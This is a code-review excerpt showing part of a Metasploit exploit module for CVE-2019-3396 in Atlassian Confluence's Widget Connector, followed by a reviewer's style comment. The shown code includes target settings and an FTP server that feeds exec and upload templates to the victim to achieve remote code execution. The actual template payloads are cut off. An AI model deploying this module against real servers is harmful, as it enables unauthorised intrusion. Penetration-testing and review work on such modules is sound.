modules/exploits/multi/http/confluence_widget_connector.rb

```diff
@@ -0,0 +1,456 @@
+      'Author'         =>
+        [
+          'Daniil Dmitriev',                # Discovering vulnerability
+          'Dmitry (rrock) Shchannikov'      # Metasploit module
+        ],
+      'References'     =>
+        [
+          [ 'CVE', '2019-3396' ],
+          [ 'URL', 'https://confluence.atlassian.com/doc/confluence-security-advisory-2019-03-20-966660264.html' ],
+          [ 'URL', 'https://chybeta.github.io/2019/04/06/Analysis-for-【CVE-2019-3396】-SSTI-and-RCE-in-Confluence-Server-via-Widget-Connector/'],
+          [ 'URL', 'https://paper.seebug.org/886/']
+        ],
+      'Targets'        =>
+        [
+          [ 'Java',    { 'Platform' => 'java',  'Arch' => ARCH_JAVA }],
+          [ 'Windows', { 'Platform' => 'win',   'Arch' => ARCH_X86  }],
+          [ 'Linux',   { 'Platform' => 'linux', 'Arch' => ARCH_X86  }]
+        ],
+      'DefaultOptions' =>
+        {
+          'RPORT' => 80,
+          'SRVPORT' => 8021,
+        },
+      'Privileged'     => false,
+      'DisclosureDate' => 'Mar 25 2019',
+      'DefaultTarget'  => 0
+    ))
+
+    register_options(
+      [
+        OptString.new('TARGETURI', [true, 'The base to Confluence', '/']),
+        OptString.new('TRIGGERURL', [true, 'Url to external video service to trigger vulnerability',
+          'https://www.youtube.com/watch?v=dQw4w9WgXcQ'])
+      ])
+  end
+
+  # Handles ftp RETP command.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] RETR argument.
+  # @return [void]
+  def on_client_command_retr(c,arg)
+    vprint_status("FTP download request for #{arg}")
+    conn = establish_data_connection(c)
+    if(not conn)
+      c.put("425 Can't build data connection\r\n")
+      return
+    end
+
+    c.put("150 Opening BINARY mode data connection for #{arg}\r\n")
+    case arg
+    when /check\.vm$/
+      conn.put(wrap(get_check_vm()))
+    when /javaprop\.vm$/
+      conn.put(wrap(get_javaprop_vm()))
+    when /upload\.vm$/
+      conn.put(wrap(get_upload_vm()))
+    when /exec\.vm$/
+      conn.put(wrap(get_exec_vm()))
+    else
+      conn.put(wrap(get_dummy_vm()))
+    end
+    c.put("226 Transfer complete.\r\n")
+    conn.close
+  end
+
+  # Handles ftp PASS command to suppress output.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] PASS argument.
+  # @return [void]
+  def on_client_command_pass(c,arg)
+    @state[c][:pass] = arg
+    vprint_status("#{@state[c][:name]} LOGIN #{@state[c][:user]} / #{@state[c][:pass]}")
+    c.put "230 Login OK\r\n"
+  end
+
+  # Handles ftp EPSV command to suppress output.
+  #
+  # @param c [Socket] Control connection socket.
+  # @param arg [String] EPSV argument.
+  # @return [void]
+  def on_client_command_epsv(c,arg)
+    vprint_status("#{@state[c][:name]} UNKNOWN 'EPSV #{arg}'")
+    c.put("500 'EPSV #{arg}': command not understood.\r\n")
+  end
+
+  # Returns a upload template.
+  #
+  # @return [String]
+  def get_upload_vm()
```

Comment:
Empty braces for method definitions, as used here, and elsewhere in this module, are unnecessary. They may also be considered bad style, and will raise Rubocop warnings.

Reply:
Removed.